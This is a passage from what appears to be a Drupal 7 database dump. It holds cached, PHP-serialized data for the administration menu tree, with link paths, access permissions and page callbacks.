functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659127,1),('links:management:tree-data:en:e954088f0e4286ac23d2aed21c4e2a377e9d63c0e8d7bf910a2bf6f2950cbe46','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:10:{i:35;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"35\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:20:\"admin/config/content\";s:11:\"router_path\";s:20:\"admin/config/content\";s:10:\"link_title\";s:17:\"Content authoring\";s:7:\"options\";s:103:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Settings related to formatting and authoring content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"35\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/config/content\";s:5:\"title\";s:17:\"Content authoring\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:53:\"Settings related to formatting and authoring content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:39;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"39\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:24:\"admin/config/development\";s:11:\"router_path\";s:24:\"admin/config/development\";s:10:\"link_title\";s:11:\"Development\";s:7:\"options\";s:68:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Development tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"39\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/config/development\";s:5:\"title\";s:11:\"Development\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:18:\"Development tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:46;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"46\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:18:\"admin/config/media\";s:11:\"router_path\";s:18:\"admin/config/media\";s:10:\"link_title\";s:5:\"Media\";s:7:\"options\";s:62:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:12:\"Media tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"46\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/config/media\";s:5:\"title\";s:5:\"Media\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:12:\"Media tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:48;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"48\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/people\";s:11:\"router_path\";s:19:\"admin/config/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:74:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:24:\"Configure user accounts.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:24:\"Configure user accounts.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:90;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"90\";s:4:\"plid\";s:2:\"48\";s:9:\"link_path\";s:28:\"admin/config/people/accounts\";s:11:\"router_path\";s:28:\"admin/config/people/accounts\";s:10:\"link_title\";s:16:\"Account settings\";s:7:\"options\";s:160:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:109:\"Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:2:\"90\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:37:\"a:1:{i:0;s:19:\"user_admin_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:16:\"Account settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:109:\"Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:142;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"142\";s:4:\"plid\";s:2:\"90\";s:9:\"link_path\";s:37:\"admin/config/people/accounts/settings\";s:11:\"router_path\";s:37:\"admin/config/people/accounts/settings\";s:10:\"link_title\";s:8:\"Settings\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:2:\"90\";s:2:\"p5\";s:3:\"142\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:37:\"a:1:{i:0;s:19:\"user_admin_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:313;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"313\";s:4:\"plid\";s:2:\"90\";s:9:\"link_path\";s:36:\"admin/config/people/accounts/display\";s:11:\"router_path\";s:36:\"admin/config/people/accounts/display\";s:10:\"link_title\";s:14:\"Manage display\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:2:\"90\";s:2:\"p5\";s:3:\"313\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:96:\"a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:14:\"Manage display\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:315;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"315\";s:4:\"plid\";s:2:\"90\";s:9:\"link_path\";s:35:\"admin/config/people/accounts/fields\";s:11:\"router_path\";s:35:\"admin/config/people/accounts/fields\";s:10:\"link_title\";s:13:\"Manage 